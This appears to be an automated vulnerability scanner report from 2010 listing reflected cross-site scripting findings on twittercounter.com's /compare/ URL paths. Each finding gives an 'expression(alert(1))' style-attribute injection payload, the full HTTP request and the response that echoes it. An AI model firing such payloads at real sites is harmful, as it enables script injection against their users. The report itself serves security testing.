HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:23 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/comparefff5c"style="x:expression(alert(1))"1d32c80c586/DiscoveryBayEnt/month/updates" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af91a"style%3d"x%3aexpression(alert(1))"b2a6f5c31e5 was submitted in the REST URL parameter 2. This input was echoed as af91a"style="x:expression(alert(1))"b2a6f5c31e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEntaf91a"style%3d"x%3aexpression(alert(1))"b2a6f5c31e5/month/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:37 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEntaf91a"style="x:expression(alert(1))"b2a6f5c31e5/month/updates" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 648b9"style%3d"x%3aexpression(alert(1))"f5eacaf91da was submitted in the REST URL parameter 3. This input was echoed as 648b9"style="x:expression(alert(1))"f5eacaf91da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/month648b9"style%3d"x%3aexpression(alert(1))"f5eacaf91da/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:48 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22879
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/month648b9"style="x:expression(alert(1))"f5eacaf91da/updates" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eeb"style%3d"x%3aexpression(alert(1))"791e502f625 was submitted in the REST URL parameter 4. This input was echoed as 41eeb"style="x:expression(alert(1))"791e502f625 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/month/updates41eeb"style%3d"x%3aexpression(alert(1))"791e502f625 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:54 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/month/updates41eeb"style="x:expression(alert(1))"791e502f625" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302d4"style%3d"x%3aexpression(alert(1))"754e099a236 was submitted in the REST URL parameter 1. This input was echoed as 302d4"style="x:expression(alert(1))"754e099a236 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare302d4"style%3d"x%3aexpression(alert(1))"754e099a236/DiscoveryBayEnt/week/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:00 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare302d4"style="x:expression(alert(1))"754e099a236/DiscoveryBayEnt/week/followers" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4cf4"style%3d"x%3aexpression(alert(1))"960da83a3f was submitted in the REST URL parameter 2. This input was echoed as b4cf4"style="x:expression(alert(1))"960da83a3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEntb4cf4"style%3d"x%3aexpression(alert(1))"960da83a3f/week/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:06 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEntb4cf4"style="x:expression(alert(1))"960da83a3f/week/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c91c"style%3d"x%3aexpression(alert(1))"afc1b2a2d66 was submitted in the REST URL parameter 3. This input was echoed as 1c91c"style="x:expression(alert(1))"afc1b2a2d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/week1c91c"style%3d"x%3aexpression(alert(1))"afc1b2a2d66/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:34 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/week1c91c"style="x:expression(alert(1))"afc1b2a2d66/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee74b"style%3d"x%3aexpression(alert(1))"72e73395bf6 was submitted in the REST URL parameter 4. This input was echoed as ee74b"style="x:expression(alert(1))"72e73395bf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/week/followersee74b"style%3d"x%3aexpression(alert(1))"72e73395bf6 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:46 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/week/followersee74b"style="x:expression(alert(1))"72e73395bf6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24019"style%3d"x%3aexpression(alert(1))"62b2a23b68b was submitted in the REST URL parameter 1. This input was echoed as 24019"style="x:expression(alert(1))"62b2a23b68b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare24019"style%3d"x%3aexpression(alert(1))"62b2a23b68b/DiscoveryBayEnt/week/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:27 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare24019"style="x:expression(alert(1))"62b2a23b68b/DiscoveryBayEnt/week/friends" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e98"style%3d"x%3aexpression(alert(1))"5515d4b76ab was submitted in the REST URL parameter 2. This input was echoed as 84e98"style="x:expression(alert(1))"5515d4b76ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt84e98"style%3d"x%3aexpression(alert(1))"5515d4b76ab/week/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:34 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt84e98"style="x:expression(alert(1))"5515d4b76ab/week/friends" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47db6"style%3d"x%3aexpression(alert(1))"be1d46ea4ac was submitted in the REST URL parameter 3. This input was echoed as 47db6"style="x:expression(alert(1))"be1d46ea4ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/week47db6"style%3d"x%3aexpression(alert(1))"be1d46ea4ac/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:43 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/week47db6"style="x:expression(alert(1))"be1d46ea4ac/friends" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c193"style%3d"x%3aexpression(alert(1))"f0c9b3a9a92 was submitted in the REST URL parameter 4. This input was echoed as 7c193"style="x:expression(alert(1))"f0c9b3a9a92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/week/friends7c193"style%3d"x%3aexpression(alert(1))"f0c9b3a9a92 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:11 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/week/friends7c193"style="x:expression(alert(1))"f0c9b3a9a92" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec92d"style%3d"x%3aexpression(alert(1))"52f0576584d was submitted in the REST URL parameter 1. This input was echoed as ec92d"style="x:expression(alert(1))"52f0576584d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b06"style%3d"x%3aexpression(alert(1))"aa00c2b8a4b was submitted in the REST URL parameter 2. This input was echoed as 96b06"style="x:expression(alert(1))"aa00c2b8a4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f33"style%3d"x%3aexpression(alert(1))"babeb43e7f1 was submitted in the REST URL parameter 3. This input was echoed as 68f33"style="x:expression(alert(1))"babeb43e7f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b648"style%3d"x%3aexpression(alert(1))"dcb7db2ec3c was submitted in the REST URL parameter 4. This input was echoed as 6b648"style="x:expression(alert(1))"dcb7db2ec3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb105"style%3d"x%3aexpression(alert(1))"42596d97015 was submitted in the REST URL parameter 1. This input was echoed as fb105"style="x:expression(alert(1))"42596d97015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /comparefb105"style%3d"x%3aexpression(alert(1))"42596d97015/fukumitsu76/3month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:32 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/comparefb105"style="x:expression(alert(1))"42596d97015/fukumitsu76/3month/followers" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51088"style%3d"x%3aexpression(alert(1))"e717cf935b5 was submitted in the REST URL parameter 2. This input was echoed as 51088"style="x:expression(alert(1))"e717cf935b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu7651088"style%3d"x%3aexpression(alert(1))"e717cf935b5/3month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:40 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu7651088"style="x:expression(alert(1))"e717cf935b5/3month/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da84b"style%3d"x%3aexpression(alert(1))"9fca19f87c6 was submitted in the REST URL parameter 3. This input was echoed as da84b"style="x:expression(alert(1))"9fca19f87c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/3monthda84b"style%3d"x%3aexpression(alert(1))"9fca19f87c6/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:58 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/3monthda84b"style="x:expression(alert(1))"9fca19f87c6/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1a8"style%3d"x%3aexpression(alert(1))"749cfa7c715 was submitted in the REST URL parameter 4. This input was echoed as fe1a8"style="x:expression(alert(1))"749cfa7c715 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/3month/followersfe1a8"style%3d"x%3aexpression(alert(1))"749cfa7c715 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:07 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/3month/followersfe1a8"style="x:expression(alert(1))"749cfa7c715" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e458"style%3d"x%3aexpression(alert(1))"2859c8081c7 was submitted in the REST URL parameter 1. This input was echoed as 5e458"style="x:expression(alert(1))"2859c8081c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare5e458"style%3d"x%3aexpression(alert(1))"2859c8081c7/fukumitsu76/month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:07 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare5e458"style="x:expression(alert(1))"2859c8081c7/fukumitsu76/month/followers" /> ...[SNIP]...
